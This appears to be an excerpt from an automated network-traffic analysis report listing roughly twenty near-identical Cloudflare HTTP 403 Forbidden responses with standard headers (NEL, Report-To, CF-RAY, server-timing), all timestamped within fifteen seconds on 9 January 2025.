Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:53 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaQlsDcAI%2FMEY3NjE6eFzIhtX8NZEnyCRmD6TKKO%2B2RBd5Cgk3Qade0GzUPhzmNxCP7YGG0tzMm%2FhbjRtGcOfXYFRife%2FUqbUtp3%2BjHzwGQ1TKsCabjT7iugidLY4bc2qGB2qo4ZfRKx%2Bgp%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3606f198c75-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1982&rtt_var=779&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1373471&cwnd=195&unsent_bytes=0&cid=8f9b242bee687773&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:54 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JKYFExS8t8JDEQk%2FbIwF0%2Fle%2BDJF3ZJZa9aeis6CVcEJGqlM6X4Su8Z7WfiqxToX%2FBlRgRAv%2FIxz7Kx6dDxSkNW%2BRsIVAHMvgIpIak1kd%2BzDoDL5VjcSeFA%2FtI%2BCsg9eBD0zrAUf0Fwoq3ro"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3642d718c95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1984&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1433480&cwnd=204&unsent_bytes=0&cid=dd24b77812e9476a&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:54 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZ6fOcIgS4IZ%2BTEYfVG%2FpNiwvR7X7YS7ATdJOvhX8j%2Fe4PqTx5tJCi%2FxQ%2Bjz8Kqsb3k4wmjo6ln1Wk%2FPR9A5Pyy8w%2Fpi2EBqDkbRQBNoz0BN0%2F%2BN1rb8v3%2FSynJwryNDKj1MsBpVxK5wqsp4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c367d8934369-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1589&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1837633&cwnd=220&unsent_bytes=0&cid=66c2eaf6a5c3ed7e&ts=124&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:55 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjMR0g2soegUjdiREVn%2FT7wA5o%2BwIUQ4kHBElbe3sM3rjW4%2BAdXsjUvRYqYGOhTdKIglLJYnOH3fdNW3nlvPOODE6FmTOdgnzWukaWMBFe40di4CbMRqpQkqD%2BrsZjX4oYWg5kGAt%2BJlu3x0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c36b8cb06a5e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2166&min_rtt=2161&rtt_var=821&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1324863&cwnd=188&unsent_bytes=0&cid=71412caa284c77f3&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PCnA1AwINrmxA5eI%2Ff5Iq2UkxcvobPpFREUmDKgnRUJ07s9XpozUY6wqztkciJfUyl3tNIIpHDGXiPUTW9ggY0P340S57N%2BnxMRkzJld2%2BfpwvQKogd%2F2V7aVpbh%2FttM5K5ijukvMg%2F1S%2FFS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c36f5f620f5d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1661&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1701631&cwnd=229&unsent_bytes=0&cid=34d045ca66b43c12&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mleGsaFPlWDFj4%2BjDkqcxZA34Cq0Sb7VaaYs4%2BYXl7wBCn0bb0QZAxMwv2gMFRkupCIVMKiaMjirlAWgws1ounJZUJtIYezljDlLsMZ%2FOA%2FfsYmnMP4CyBqdahEk%2FK2j1Fib%2B0g8HT%2FD%2FCt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c37338ee4228-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1690&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1628555&cwnd=209&unsent_bytes=0&cid=e927322e7a34ea79&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:57 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OV2EdgTiyM%2BkKnfUcqNy78fxTMw4BkoSguD2SAtFzM0uhzYsUoPn4D1DcRYNABRtsxlBfQsFik9sQeZx9bkJ5%2BsFWi1fCmoJeSlkj1F46YlbRNq%2BUWQRTQ1ZqO7t9%2BVr7EJ55F6eVmSt7djQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c376daccf78f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1639&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1775075&cwnd=137&unsent_bytes=0&cid=01dcafc475cf11f4&ts=118&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:58 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LlZ39reThvgL9HCFHej8c%2FDykBaFYDEG1JunK%2FCp53aiHzMBS1miv6X7kHGo07njA9N1qm84TqpuLSfgLAJl%2FW1DuLXBPlDz9sp6AfRk5XvF3ljBpBTWxzz6wvgJKt4xN%2BAw85VtfUC%2Bl%2BE2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c37bdc6bde94-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1668&rtt_var=679&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1750599&cwnd=235&unsent_bytes=0&cid=98becd8f09ed18b2&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:58 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PA3V2q1ROWzVEOhScil3fnU5sCeAPsJA0FAfHz5CcWZt%2FrABHivnRTDsx%2FQSdLD6JfLcuxCgTNVSCFa9Tsr7QqldDalNhiakZbaqNT5VMYFtuwMJl%2BXd0SkW9b32r9xxlVVF7kIXPa%2BLC2om"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c37fafe941b4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1703&rtt_var=673&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1584373&cwnd=199&unsent_bytes=0&cid=1f72eab013b171e3&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:59 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTj4%2FnLrb80ZeHqjwhhW%2B%2BLmkiKMdVd2XWx2ErJxAeYutNSJ1dpU7lVNFaC7XA9CiBso%2B1TvQZiA%2Fo8FrVVLyV9B2bFuK%2FRuVsIWjVZtTITFFyO9bKtEOmqNG%2BSFDbX6dXt0qDKGapoznVRQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3837c8cde93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1566&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1799137&cwnd=248&unsent_bytes=0&cid=cda18fedd0df2ed0&ts=136&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:37:59 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59P9DCtE3vQZGJRsjenNrmXCOGxbBguGf%2BZsECy%2FFjBO6zBUM%2FZOghQDGscErSUY75e3wfjvZ9U2LWI7PhJlW4VCkguGNdfQxFuF1xlHSeqdDmfDaUzOqK%2BcSxm8v0xBISoGm0F0zye8ZZlW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3872d14f795-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1625&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1759036&cwnd=187&unsent_bytes=0&cid=3dbba489085d334f&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:00 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyp6w2TWdAHQK%2B2kxCs1uCLeI6e8Cv2rdt18N4hwJ1cznC89dip45b716c5L1CZ1Vg1U6KS9OfqF0tG6HDZEVvtyzQUoICFJpRd1AoQFH2xjnjgPTcrZcJ1F5axsCw06mJWy7G7L4%2FTyDdXR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c38b0f1818b4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1615&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1734997&cwnd=201&unsent_bytes=0&cid=714d3adfdae38084&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pC7uAxmq6R4lhbvCJq%2FLbgvddI0YrPvF%2BqVPjAgnBpFTnE0beV20OKAAbwrTAmC29b5ZZTLN7mniGqDD%2FS24zwhRhx0jssy6wOtUtprnTQgFge82XEqC9uuvwdFwhweroMauOXJ5%2BzN5S26Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c38ece7442a3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1693&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1660034&cwnd=160&unsent_bytes=0&cid=28c9e87cf07b1bbf&ts=123&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zI4%2BRVzBGiYf3B%2Fi6sLJN3KcFc2j0a6GIFkdnTNDRtZU3Ntbu2xq57LGrTkLn9hK6dMoYuL72lq3J6%2FuCSMlm%2B9k8tYtdYhr3LRr1g%2FFh%2FpEGDCxoPLTM3FS0ygtWH6qgCUmDy3%2FfTyj0jpw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3927f57c459-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1676&rtt_var=638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1701631&cwnd=231&unsent_bytes=0&cid=bc230a5ead77d952&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hHs28Mj7xTnu2GQaSAdnvZyto4ZXTR%2BYBarcfYA3FYJq5MD1nJwhIPSRPDzoBZrnSVYpF8z2DrG%2BlUw0Frgg4kVTP476IVmAqnsYuis%2BpAxhD80nz2GHKt%2F2gJ24RGNwq0TZu0bJHW2B6NL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3966de37d18-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1986&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1422308&cwnd=222&unsent_bytes=0&cid=67f867b4779a466d&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35rY%2FrEopJoq5Bysk35R0Eh5JfLvPq10mF%2F56fj6L%2FJ6lvZUuriZlnYNmMlBbt2pRTe%2BUy3TFCwM9CtTSFPkUANlyoM1BXSFUQ3koF8GqgVYR9FZdsI%2BKL2TM0SeuIOjTd1PaXZ8S7%2B1vg85"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c39a08ac1885-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1657&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1736028&cwnd=193&unsent_bytes=0&cid=c1fa34c5932adce6&ts=125&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:03 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u8E7x7euwLOyK5jr5Mx%2BcIhptYSdmyRcHnkCadZS7bz0koSBU%2BZtECQy9nRMrsxVIqCRLGlGbD3uGWcgz4ebtSJaJl7%2FF8k1QVuAqJkKW9UkNKqX3Iv3nWjf1mBZPzaie5F2JQzn2rAecMBi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c39defda0fa9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1487&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1921052&cwnd=252&unsent_bytes=0&cid=87056122f3552d24&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99vzSEcpFr9pixduA5mXmQG5VO5orm8jZy5AfAMRexIvPAPXsM83PzCQwVRJqKT%2BCGwjzt8Ov1lzSBBvBscvmwCyP43Cookr2MQCA3wwkG0Kv%2Bbb5R27j%2BynZ7wWpBb%2ByIB76V2h9qgGCGro"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3a1d95b4228-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2174&min_rtt=2171&rtt_var=820&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1329085&cwnd=209&unsent_bytes=0&cid=bfe47a758aa9af2c&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4MzIkhCAp6RGiROg4bcJ5fdWgA%2FsJfOqNN%2BakgTXbRdw%2BsrcDsz7tuACc50TmANNA8s4%2FohWbr%2FitK6MXu7pwWyU%2Btre6oxQZ69NDK5JT3M%2FCjUWdoIcyHzScaKU6EheH8HyeYh6RaPK%2B1gq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3a5a90f5e6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1535&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1795817&cwnd=239&unsent_bytes=0&cid=17dedeeab77212db&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wdc9jMeEefcwcMgXHGHhKydvZK%2BbxTdTmz6ywUKh1%2Fk4MUqm9MIZ9llNy90Txl8tQ7Zc67uHiR99%2B9mgdJqEU6wysiE0ZQvE3mG6Gg9kysELk1SixioD%2BBH4dG6eyByxpY7RWLWg8DMCt3wI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3a96ea54210-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1708&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1564006&cwnd=246&unsent_bytes=0&cid=e858536c51c7dd55&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLrxJVXY9iJxM9v0fboGMev1796RcyGuowsUdGkE6m%2FFVSWa9fusFhx6aq0jPWrL5S7KOi5SIkyZuzi73MxdKP%2BpI8S7of8CUw%2Bhv6GEPTj0zXUk2z1ej%2BEt2PFL0DCUkIlpp78p%2FzeJvFVw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3ad08c842d7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1747&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1598248&cwnd=245&unsent_bytes=0&cid=a9943f0678904f50&ts=122&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnu96306BsQMlhAT5Wws644AJh5ljgSIH%2BORMTBCtF4mIGaw3fjR23efNbk%2FUYMrx9n76e25U6Hkl5kBKqXQ6AAM7Snckt48KwtSaC18flLI6UCZBO%2BVMN6nJolAUiWeu1KXDIjEKGzZVFjD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3b0c9120f3e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1502&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1642294&cwnd=217&unsent_bytes=0&cid=71bd8f14b8a3dfcc&ts=127&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:37:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QmuGnEYNwWCXIsVR3sA0VZnx4u2abP%2BSZc%2F4P8q%2BzK9Ec35kT4Sb7sY3XUqWz23Al3NkZ7WFFn5gVPf8KkjrNBKZ7jXia14Vud2DicAcOcNEpCuuTIb%2BRweFPpKX3qDSBUJYCYjylRkHZPfL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c3b47e1b41ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1671&rtt_var=640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1693735&cwnd=192&unsent_bytes=0&cid=7e74a24f50cbee1f&ts=130&x=0"
